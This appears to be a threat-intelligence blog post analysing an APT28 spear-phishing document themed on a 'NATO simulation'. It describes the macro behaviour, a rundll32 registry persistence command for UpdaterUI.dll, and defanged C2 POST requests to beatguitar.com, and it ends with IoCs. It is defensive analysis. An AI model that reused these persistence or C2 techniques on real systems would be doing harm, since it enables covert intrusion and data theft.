APT28, aka Fancy Bear, the famous hacker group believed to be state-sponsored from Russia, seems to be targeting NATO partners / defense / military institutions / affairs in these hours. Spear-phishing emails with attached a malicious document referring to a “nato simulation” event (the name of the doc is “NATO Simulation.doc“), seem to be used to try to compromise some institutional entities (likely from north / east europe).
The hunting group involved in the analysis of this event is composed by @MD0ugh, @DrunkBinary, @r0ny_123, @Manu_De_Lucia.
Thanks to @MD0ugh for sharing the sample with all of us.
The document has been designed to drop a first malicious component likely belonging to the APT28 / Fancy Bear arsenal.
A quite high rate of code reuse and internal analysis confirm it ‘s a SedUploader variant.
Meta-data and others investigations seem to suggest that the malicious infrastructure and components have been setted up only few days ago (at the end of November 2018).
Some images about the domain name creation date
and the service setting up
On the basis of what i can observe in samples and public data, following there is a timeline reconstruction about the development of the operation:
A screenshot of part of the decoy attached is shown following:
This spear-phishing document (md5: 43D7FFD611932CF51D7150B176ECFC29) is armed with macro code designed to work primarly through the main event controlled by sub AutoOpen().
On offset 0x00006460 the .bin embedded content.
On macro activation the instructions are designed to read specific xml node of the document itself through xmlParser and extract / decode the base64 encoded content from XPath
Extracted VBA macro code seems to be very similar to that used previously in APT28 / Fancy Bear “hospitality campaign”.
Following an image which compares an extract of the two codes:
The payload is no more than a PEDLL executable file.
This is dropped under
Files are written with vbHidden attributes.
Following a part of base64 encoded payload:
Macro instructions within sub_AutoOpen() function are designed to achieve persistency also, writing under the following RegKey
with a REG_SZ value
“C:\Windows\System32\rundll32.exe “%ALLUSERSPROFILE%\UpdaterUI.dll “, “#1″”
First run performed through WMI
sub_AutoClose() has similar functionality writing a PE with a rnd generated name under %TEMP% which appears to be executed via PowerShell.
The content dropped seems to be a SedUploader variant identified with MD5 hash: 549726B8BFB1919A343AC764D48FDC81
Some details about:
From the malware components under my lenses, the actor is proposing the same TTPs observed in similar operations conducted in the past.
I performed at first a statical / comparative code analysis of the malicious executable, obtaining the following results:
Malware family was confirmed later by Intezer platform. View their report here
Looking at some DNS statistical hits observed for the domain name extracted, may be that at least one of these spear-phishing documents achieved the mission of first phase access. Obviously, no truth about it [really still few statistics about].
Finally, a quick high level exploding of the main cycle of the malware is reported following:
The outside word is contacted through requests like these:
[+] POST hxxps://beatguitar.com/aadv/gJNn/X2/ep/VQOA/3.SMPTE292M/?ct=+lMQKtXi0kf+3MVk38U=
[+] POST hxxps://beatguitar.com/n2qqSy/HPSe0/SY/yAsFy8/mSaYZP/lw.sip/?n=VxL0BnijNmtTnSFIcoQ=
after to have collected several infos about the victim system and to have performed some minimal anti-VM and connectivity checks [requesting legitimate services].
The first list of IoC reported and components under analysis are compatible with the modus operandi of group in question (domain registration, technologies in place, components, fingerprint). The activity is in line with the actor mission also.
At time of writing, some others further malicious domain names possibly related to the campaign are under investigations. Anyway, analysis is ongoing.
domain name: beatguitar[.]com
md5: 43D7FFD611932CF51D7150B176ECFC29 [Spear-phishing DOC]
md5: 549726B8BFB1919A343AC764D48FDC81 [SedUploader / SofacyCarberp]
File name: NATO Simulation.doc
File name: UpdaterUI.dll
File name: Uplist.dat
FireEye: APT28 targets hospitality sector
PaloAlto Unit42: Sofacy Attacks Multiple Government Entities
CSECybSec: APT28 – Hospitality Malware
ESET Research: Sednit update: Analysis of Zebrocy